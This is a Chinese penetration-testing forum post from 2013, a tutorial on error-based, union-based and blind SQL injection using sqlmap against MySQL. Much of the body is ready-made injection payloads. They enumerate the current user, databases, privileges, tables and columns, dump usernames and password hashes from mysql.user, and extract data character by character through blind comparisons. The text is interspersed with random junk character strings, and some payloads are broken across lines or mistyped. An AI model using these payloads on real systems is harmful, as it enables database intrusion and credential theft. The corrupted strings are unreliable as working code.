找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 sqlmap高级注入
返回列表 发新帖
查看: 3420|回复: 0
打印 上一主题 下一主题

sqlmap高级注入

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-7-16 20:31:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。
, C* J3 {0 t2 S ' O0 m; ?1 Q+ _4 V" ^: _
这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表
5 q% |" U5 D  I* z
! a" q0 L  H. ^% W, {/ g分类标准        分类        备注
" [9 @) f4 d; ?# s' P% y5 J按字段类型        整型注入,字符型注入       
; i* m4 e6 n0 V按出现的位置        get注入,post注入,cookie注入,http header注入        1 c; E5 |2 o1 h/ Q
然而高级注入是这样的, z: ^* h9 S; i3 ~+ S9 R  k8 `
8 e0 D( `; x1 X' m- M, K
高级注入分类        条件
" a2 n+ b' L0 l* qerror-based sql        数据库的错误回显可以返回,存在数据库,表结构4 ^; W! d, ?8 Y3 E6 Z/ g! g- E+ m4 c
union-based sql        能够使用union,存在数据库,表结构
1 ]3 `0 r! M7 ]3 mblind sql        存在注入- T: {) R5 S! g- e( H5 _
我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。3 F/ r2 }3 {, r. p9 ?8 t) }

) y6 I# |( ~" q( V/ i3 k. Z好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火
% J- q: M) w0 q; X5 O
+ p3 i/ I: L' b. {7 C" h8 \附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。
# e# b. n; `$ N# `& h$ O $ E& G, l% a7 u! ?
这里用mysql说明
* J% A) c$ V* V# B " J' m) Z% k, I4 }
e注入坛子里很多了,请看戳我或者再戳我
/ @' A  L9 a  z; I, I ) Z5 T" C, {: @
u注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的
* O/ l2 {, c( X4 c* g- v( z8 j 8 g' N- {# W# s: [- u7 M
获取当前数据库用户名. Q9 r& G: j( H& j, S) F
5 t+ J* k! `6 ?* [" r3 ]$ k0 @. H
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C" l  @! C; A- G' f
AST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL. Y9 m! ~7 |1 k+ J/ \
L, NULL#
! I0 C; C7 ^1 C! ]5 t  f3 b  X' u( _4 k注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。
3 c5 o7 O/ k1 J+ w. C! G7 C ) x8 b/ z: g+ u5 V# W& g
获取数据库名1 T& g$ K6 H9 m. _, U( ?, J6 J
6 H! S( G7 B# k" P  H
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
2 [0 Y. x6 h( t6 S0 p% a获取所有用户名2 E8 d+ H! N7 o7 }0 Y
" U( g0 q; f3 ^0 Y5 R6 g5 W
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#8 I* p# k: {& C3 B: V
查看当前用户权限6 B3 F3 Y0 ]. q8 A8 a1 s1 Q

# L# O  D  j: m1 K" \( ZUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
7 S$ e) Y4 I. I0 E; |6 u尝试获取密码,当然需要有能读mysql数据库的权限, _' @  |* w8 V9 ~

: L4 w0 j6 k- a( \" cUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#
. M5 `. W1 f6 D获取表名,limit什么的自己搞啦6 P/ q8 m: k- ?
2 c) _3 {0 D' |* @: U
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#
, R4 o- u, U2 ~1 }, {; X获取字段名及其类型9 Y1 {) \! [, o6 J6 d; _
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#
. W8 {0 |- ]7 o# ? * A% t' k! b. A. k
b注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。1 |2 Y; N5 Z+ T8 v
* Z3 q8 G/ ]& a0 O6 r2 L
如:
7 ]& X' ], h- f+ D  v& N获取当前用户名
4 X: z( K1 K. X+ f3 ?6 c% a9 t) u 0 t' b- `1 ~" R2 Y" K4 O7 W
AND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116' P5 j5 P" Z3 X. I6 n
获取当前数据库: |& u% m; I5 |, V

! h* c* k( _2 _$ rAND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106
3 R) N' d3 c0 t! x获取表名4 L2 r  u$ L9 U  E' @4 U" [

# }3 d8 y& R& e5 N- GAND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 51
# u  ^4 J8 F" q0 t; u7 N8 Y/ z$ W获取字段名及其类型和爆内容就不说了,改改上面的就可以了。
$ H" w* E$ S. Y9 Z+ Y. {+ c回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。+ j' `* Q" ]2 F' _9 V" Y
爆表) G" E7 ?+ e( |/ ^  p8 y' G5 Z

5 o6 g/ {. Q  SAND EXISTS(select * from table)
7 R+ ]" W/ I) F$ f+ ^5 u9 Q) D爆字段
, j7 g% D3 E  F: h5 U. q  d3 E; L $ f% G" x) N5 v5 f# [3 z( b4 t! r( X
AND EXISTS(select pwd from table)9 u$ ]( W8 G1 Z  y
盲注的变化就比较多了,由于篇幅,只是举个例子而已。2 M9 e( W4 ]% s5 h1 h' p
2 W. B3 Z1 V! @
本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。) E! M1 J4 w9 {% }, [
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表